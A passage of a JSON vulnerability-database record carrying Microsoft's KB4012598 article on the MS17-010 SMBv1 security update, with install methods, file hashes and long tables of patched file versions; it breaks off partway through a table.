"9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}]}, "lastseen": "2019-10-05T22:48:35", "differentElements": ["cvelist", "cvss", "mscve"], "edition": 1}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "d86a4742bbfb67c9b27c83e8de1bfb42cc7a6d12f2fd7b5fa1288284e1ac290a", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important <br/><br/></span><ul class=\"sbody-free_list\"> <li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Get security updates automatically</a>. <br/><br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span></span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><formatting type=\"H3\">File hash information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4012598-ia64.msu</td><td>83A6F5A70588B27623B11C42F1C8124A25D489DE</td><td>29B40D7E75186A9CCC9F2F309417E374846F35F41B4D1DE6DBE85F439DC1837F</td></tr><tr><td>Windows6.0-KB4012598-x64.msu</td><td>6A186BA2B2B98B2144B50F88BAF33A5FA53B5D76</td><td>A91A0AF728225FF2A630B9ABA4E639473AA8ABE7CAA23BE10AE48A7887BDE9C8</td></tr><tr><td>Windows6.0-KB4012598-x86.msu</td><td>13E9B3D77BA5599764C296075A796C16A85C745C</td><td>FC7F28A72C117C2A8ECE5916532048C8BF3379C86386348C24319EAC2C6B23C8</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H3\">File information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><boilerplate boilerplatename=\"QFEFileAttributes\" version=\"7\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables.</boilerplate><formatting type=\"H4\">Windows Vista and Windows Server 2008 file information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><formatting type=\"B\">Notes: </formatting>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><formatting type=\"H5\">For all supported ia64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>15:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:01</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>16:55</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:14</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:35</td><td>IA-64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:16</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>297,984</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>297,984</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>967,168</td><td>11-Feb-2017</td><td>15:31</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>969,216</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>468,480</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>474,624</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>233,984</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>239,104</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>289,792</td><td>03-Aug-2016</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>16:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>263,168</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:16</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,952</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>248,320</td><td>03-Aug-2016</td><td>17:02</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>261,120</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,152</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>231,936</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>233,984</td><td>11-Feb-2017</td><td>17:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>239,104</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>289,792</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>263,168</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:42</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:41</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,952</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>248,320</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>261,120</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,152</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>231,936</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>16:23</td><td>x64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:41</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>448,512</td><td>11-Feb-2017</td><td>15:48</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>448,000</td><td>11-Feb-2017</td><td>15:44</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>176,128</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>178,176</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x86-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not 